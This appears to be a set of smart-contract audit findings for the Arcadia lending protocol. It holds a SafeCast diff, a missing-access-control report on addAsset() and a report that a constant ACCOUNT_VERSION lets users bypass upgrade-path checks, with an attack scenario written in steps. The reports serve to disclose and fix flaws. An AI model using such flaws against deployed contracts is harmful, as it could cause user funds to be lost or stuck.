    function addTranche(address tranche, uint16 interestWeight_) external onlyOwner processInterests {
        if (auctionsInProgress > 0) revert LendingPoolErrors.AuctionOngoing();
        if (isTranche[tranche]) revert LendingPoolErrors.TrancheAlreadyExists();

        totalInterestWeight += interestWeight_;
        interestWeightTranches.push(interestWeight_);
        interestWeight[tranche] = interestWeight_;

-        uint8 trancheIndex = uint8(tranches.length);
+        uint8 trancheIndex = SafeCastLib.safeCastTo8(tranches.length);
        tranches.push(tranche);
        isTranche[tranche] = true;

        emit InterestWeightTrancheUpdated(tranche, trancheIndex, interestWeight_);
    }

0xrice.cooker - addAsset() can be called by anyone in StakedStargateAM and StargateAM contract

0xrice.cooker

high

addAsset() can be called by anyone in StakedStargateAM and StargateAM contract

Summary

addAsset() can be called by anyone in StakedStargateAM and StargateAM contract

Vulnerability Detail

Pretty straightforward: addAsset() can be called by anyone in the StakedStargateAM and StargateAM contracts.

In the code comment:

No end-user should directly interact with the Stargate Asset Module, only the Registry, the contract owner or via the actionHandler

Impact

A malicious user can add a pool, which can cause unexpected behaviour.

Code Snippet

https://github.com/sherlock-audit/2023-12-arcadia/blob/de7289bebb3729505a2462aa044b3960d8926d78/accounts-v2/src/asset-modules/Stargate-Finance/StakedStargateAM.sol#L62C1-L71C6
https://github.com/sherlock-audit/2023-12-arcadia/blob/de7289bebb3729505a2462aa044b3960d8926d78/accounts-v2/src/asset-modules/Stargate-Finance/StargateAM.sol#L62C1-L77C6

Tool used

Manual Review

Recommendation

Add the onlyOwner modifier to those functions, as sketched below.
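A minimal, hypothetical sketch of the pattern; the real asset modules inherit their ownership logic and have different addAsset bodies, so the contract below only illustrates gating pool registration behind the owner:

    // SPDX-License-Identifier: MIT
    pragma solidity 0.8.22;

    contract StargateAMSketch {
        address public immutable owner;
        mapping(uint256 => bool) public poolAdded;

        error OnlyOwner();

        modifier onlyOwner() {
            if (msg.sender != owner) revert OnlyOwner();
            _;
        }

        constructor() {
            owner = msg.sender;
        }

        // Pool registration is now restricted to the contract owner.
        function addAsset(uint256 poolId) external onlyOwner {
            poolAdded[poolId] = true;
        }
    }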

Duplicate of #62

jesjupyer - `ACCOUNT_VERSION` is always 1, which could lead to unauthorized upgrade

jesjupyer

high

ACCOUNT_VERSION is always 1, which could lead to unauthorized upgrade

Summary

The ACCOUNT_VERSION variable defined in the AccountV1 contract is a constant fixed at 1. Every time AccountV1::upgradeAccount is called, ACCOUNT_VERSION is used as oldVersion and the stored version information of the account is never changed. This creates the confusion that the account has been upgraded to newVersion while it keeps reporting ACCOUNT_VERSION. Also, since ACCOUNT_VERSION is queried by Factory::upgradeAccountVersion, currentVersion will always be 1, affecting the canUpgrade check and allowing unauthorized upgrades.

Vulnerability Detail

Consider the contract AccountV1, where ACCOUNT_VERSION is defined as the constant 1.

    uint256 public constant ACCOUNT_VERSION = 1; 

So, in the function AccountV1::upgradeAccount, oldVersion is wrongly taken to be ACCOUNT_VERSION, which is 1, and the input newVersion is never stored in the contract.

        uint256 oldVersion = ACCOUNT_VERSION;

        // Store new parameters.
        _getAddressSlot(IMPLEMENTATION_SLOT).value = newImplementation;
        registry = newRegistry;

        // Prevent that Account is upgraded to a new version where the Numeraire can't be priced.
        if (newRegistry != oldRegistry && !IRegistry(newRegistry).inRegistry(numeraire)) {
            revert AccountErrors.InvalidRegistry();
        }

        // If a Creditor is set, new version should be compatible.
        if (creditor != address(0)) {
            (bool success,,,) = ICreditor(creditor).openMarginAccount(newVersion); // @follow-up previous account?
            if (!success) revert AccountErrors.InvalidAccountVersion();
        }

        // Hook on the new logic to finalize upgrade.
        // Used to eg. Remove exposure from old Registry and add exposure to the new Registry.
        // Extra data can be added by the Factory for complex instructions.
        this.upgradeHook(oldImplementation, oldRegistry, oldVersion, data);

As a result, even after the account has been upgraded, its ACCOUNT_VERSION will still return version 1, which is incorrect.

Since the function AccountV1::ACCOUNT_VERSION() is queried by Factory::upgradeAccountVersion as currentVersion and then verified via MerkleProofLib.verify, this could lead to unauthorized upgrades.

        uint256 currentVersion = IAccount(account).ACCOUNT_VERSION();
        bool canUpgrade =
            MerkleProofLib.verify(proofs, versionRoot, keccak256(abi.encodePacked(currentVersion, version)));

        if (!canUpgrade) revert FactoryErrors.InvalidUpgrade();

Consider the following scenario:

  1. Currently, the protocol has account versions v1, v2 and v3.
  2. Only upgrades from v1 to v3 and from v1 to v2 are allowed, and the versionRoot is set via setNewAccountInfo accordingly.
  3. A user has upgraded to v2. Even though v2 to v3 is not supported, the user can still submit the proof for the v1-v3 upgrade and pass MerkleProofLib.verify, since ACCOUNT_VERSION is always 1 and only the (1, 3) version pair is examined and verified. This leads to unauthorized upgrades, which can cause funds to be lost or stuck for users.

Impact

The ACCOUNT_VERSION variable defined in the AccountV1 contract is a constant fixed at 1, so an account that has been upgraded to newVersion still reports ACCOUNT_VERSION. Since AccountV1::ACCOUNT_VERSION() is queried by Factory::upgradeAccountVersion as currentVersion and then verified via MerkleProofLib.verify, this can lead to unauthorized upgrades.

Code Snippet

AccountV1::ACCOUNT_VERSION

    uint256 public constant ACCOUNT_VERSION = 1; 

AccountV1::upgradeAccount

        uint256 oldVersion = ACCOUNT_VERSION;

        // Store new parameters.
        _getAddressSlot(IMPLEMENTATION_SLOT).value = newImplementation;
        registry = newRegistry;

        // Prevent that Account is upgraded to a new version where the Numeraire can't be priced.
        if (newRegistry != oldRegistry && !IRegistry(newRegistry).inRegistry(numeraire)) {
            revert AccountErrors.InvalidRegistry();
        }

        // If a Creditor is set, new version should be compatible.
        if (creditor != address(0)) {
            (bool success,,,) = ICreditor(creditor).openMarginAccount(newVersion); // @follow-up previous account?
            if (!success) revert AccountErrors.InvalidAccountVersion();
        }

        // Hook on the new logic to finalize upgrade.
        // Used to eg. Remove exposure from old Registry and add exposure to the new Registry.
        // Extra data can be added by the Factory for complex instructions.
        this.upgradeHook(oldImplementation, oldRegistry, oldVersion, data);

Factory::upgradeAccountVersion

        uint256 currentVersion = IAccount(account).ACCOUNT_VERSION();
        bool canUpgrade =
            MerkleProofLib.verify(proofs, versionRoot, keccak256(abi.encodePacked(currentVersion, version)));

        if (!canUpgrade) revert FactoryErrors.InvalidUpgrade();

Tool used

Manual Review, VSCode

Recommendation

Don't define ACCOUNT_VERSION as a constant; move it to AccountStorageV1 and update it with each upgrade, as sketched below.
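A minimal, hypothetical sketch of the idea, with names simplified and the rest of the upgrade logic omitted:

    // SPDX-License-Identifier: MIT
    pragma solidity 0.8.22;

    // The version lives in (proxied) storage instead of being a constant baked
    // into the implementation, so it reflects the actual upgrade history.
    contract AccountStorageSketch {
        uint256 public accountVersion;
    }

    contract AccountSketch is AccountStorageSketch {
        // Simplified stand-in for AccountV1.upgradeAccount; the real function also
        // updates the implementation slot and registry and runs compatibility checks.
        function upgradeAccount(uint256 newVersion) external returns (uint256 oldVersion) {
            oldVersion = accountVersion;
            accountVersion = newVersion;
            // oldVersion would be passed on to upgradeHook in the real contract.
        }
    }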
